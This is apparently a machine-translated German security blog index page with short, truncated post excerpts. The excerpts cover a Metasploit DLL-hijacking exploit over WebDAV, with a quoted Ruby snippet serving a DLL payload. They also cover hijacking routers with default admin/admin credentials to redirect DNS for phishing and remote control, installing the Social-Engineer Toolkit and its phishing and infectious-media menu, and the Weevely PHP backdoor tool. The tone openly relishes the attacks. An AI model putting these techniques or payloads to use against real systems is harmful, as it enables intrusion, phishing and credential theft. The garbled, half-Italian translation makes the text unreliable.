ClsHack:Computer Security Blog    

Mehr Informationen zu dieser Sicherheitsanfälligkeit, man hier finden kann:

[DLL-Hijacking] Windows- 7 und mehr Anwendung Remote-Code Exuction => metasplooit

Betrachten wir nun als Software-Schwachstellen :D

Immer in der oben genannten, Ich habe gezeigt, dass mit Metasploit kann diese Sicherheitsanfälligkeit ausnutzen zu, mit WebDAV, auch nur im Entferntesten.

L'Exploit Creato da HD Moore, metaploit Entwickler ist sehr einfach.
Der Code, der uns interessiert, ist:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end

(mehr…)

In sehr wenigen, ändern Sie das Passwort zum Router -. -’ für die Bequemlichkeit verlassen Sie die Standardeinstellung, dass einfach zu erinnern o.o

Benutzer: admin
Kennwort: admin

So, wenn der Router erreichbar ist aus, oder wenn ein Benutzer, in der Lage, sich unserem Netzwerk anschließen kann die Nutzung dns Durchführung von gezielten Angriffen auf Ihren PC :D
Die Angriffe reichen von Phishing:
Wiki:

Im Bereich der Computer-Sicherheit, Phishing ist die strafrechtlich betrügerische Prozess von Versuch auf vertrauliche Informationen wie Benutzernamen erwerben, Passwörter und Kreditkarten-Informationen von sich als eine vertrauenswürdige Person, die eine elektronische Kommunikation. Kommunikation, die angeblich von populären sein sozialen Web-Sites, Auktions-Websites, Online-Payment-Prozessoren oder IT-Administratoren werden häufig verwendet, um die ahnungslose Öffentlichkeit zu locken. Phishing wird typischerweise per E-Mail oder Instant Messaging durchgeführt.

bis zu nehmen Fernbedienung von dem PC des Opfers :D

All dies unter Verwendung der DNS.
Wenn wir in den Router gehen, zusätzlich zu den SSID des WLAN “Was für ein Arschloch, dass SIE” / “Sei un merda” und verschiedene Mist wir können den DNS-.
Zum Beispiel, Google I diejenigen o.o

Ich DNS-Server, vulgär gesprochen, nichts anderes tun, kehren die IP der Seite, auf welche wir zusammenbringen, zum Beispiel, wenn wir geben www.clshack.com:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.com. IN A
;; ANSWER SECTION:
www.clshack.com. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
Sie gibt:
94.141.22.26
(mehr…)

Die Social-Engineering-Toolkit (SET) wurde produziert von David Kennedy und machen es der Angreifer nutzt einige bemerkenswerte, Social-Engineering-Typ mit einem bequemen Interface :D

Das Hauptziel SET ist die Automatisierung von solchen Angriffen, fast immer mit menschlichen Dummheit.

Mal sehen, wie Sie mit.
sudo apt-get install python-pexpect
Wir müssen einen symbolischen Link machen würde sonst nicht gesetzt, wenn wir nicht tun werden backtrack 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Zum Beispiel:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/

Wir gehen in der Klemme, und wir laden Sie die neueste Version:

svn co http://svn.secmaniac.com/social_engineering_toolkit SET/
cd SET
sudo ./set
Einmal geöffnet, avremo ein Menü ein po’ lamerico -. -’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Lassen Sie uns im Detail die Optionen zu sehen.

1. Spear-Phishing-Angriff Vektoren
Typing 1, wir haben wesentlich 3 Optionen:

• Führen Sie eine E-Mail Messe Angriff
• Erstellen Sie eine FileFormat Nutzlast
• Erstellen Sie ein Social-Engineering-Vorlage

(mehr…)

Weevely ist ein Tool zum Erstellen und Verwalten eine Hintertür auf dem entfernten Webserver PHP versteckt.

Weevely verschlüsselt die Kommunikation zwischen Client und Server innerhalb von Feldern HTTP_REFERER plausibel, sich in Forschung und NIDS-Logs des Webservers zu verbergen.
Weevely permette di:

Backdoor PHP dynamisch erzeugen die verschlüsselte

• Ausführen von Befehlen auf Remote-Shell, Verschleierung von Anfragen innerhalb von HTTP_REFERER plausible
• Simulieren Sie ein Terminal, um Befehle an die entfernte Shell schicken kann wie oben
• Vermeiden Sie einige PHP-Konfigurationen, die die Ausführung von Befehlen auf dem System beschränken
• Module laufen auf dem entfernten Rechner, um Aufgaben zu automatisieren.
• Fügen Sie neue Module schnell und einfach

Scritto in python Open-Source-E.
Für die Installation auf Debian / Ubuntu:
sudo apt-get install python-numpy
(mehr…)

Sicherheit weniger… wessen Schuld ? Fast immer unsere… Zum Beispiel, ein Ruck H4, ein potenter’ Mal trat er vor den Blog von unserem Freund sskull.

Wie hat sich ?

Mit einer Brute-Force-Angriff, unser Freund sskull einige hatten ein Passwort links’ zu schwach und die scheisse Kind getreten…
(mehr…)